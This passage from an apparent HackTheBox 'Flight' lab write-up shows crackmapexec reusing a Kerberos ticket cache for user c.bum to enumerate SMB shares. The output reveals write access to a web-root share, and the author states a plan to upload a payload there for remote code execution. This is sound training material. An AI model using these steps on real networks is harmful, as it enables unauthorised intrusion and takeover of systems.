c.bum Session
Checking for SMB access of the c.bum user with the TGT
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ KRB5CCNAME=c.bum@g0.flight.htb.ccache crackmapexec smb g0.flight.htb -k --use-kcache --kdcHost g0.flight.htb --shares
smb g0.flight.htb 445 g0 [*] windows 10.0 build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB g0.flight.htb 445 G0 [+] flight.htb\ from ccache
SMB g0.flight.htb 445 G0 [+] Enumerated shares
SMB g0.flight.htb 445 G0 Share Permissions Remark
SMB g0.flight.htb 445 G0 ----- ----------- ------
SMB g0.flight.htb 445 G0 ADMIN$ Remote Admin
SMB g0.flight.htb 445 G0 C$ Default share
SMB g0.flight.htb 445 G0 IPC$ READ Remote IPC
SMB g0.flight.htb 445 G0 NETLOGON READ Logon server share
SMB g0.flight.htb 445 G0 Shared READ,WRITE
SMB g0.flight.htb 445 G0 SYSVOL READ Logon server share
SMB g0.flight.htb 445 G0 Users READ
SMB g0.flight.htb 445 G0 Web READ,WRITE The c.bum user has write access to the \\g0.flight.htb\Web share
The share has already been enumerated and identified to be hosting the web root directory for those 2 web applications
Now that write access granted as the c.bum user, I can upload(write) a payload to one of the web app directories for remote code execution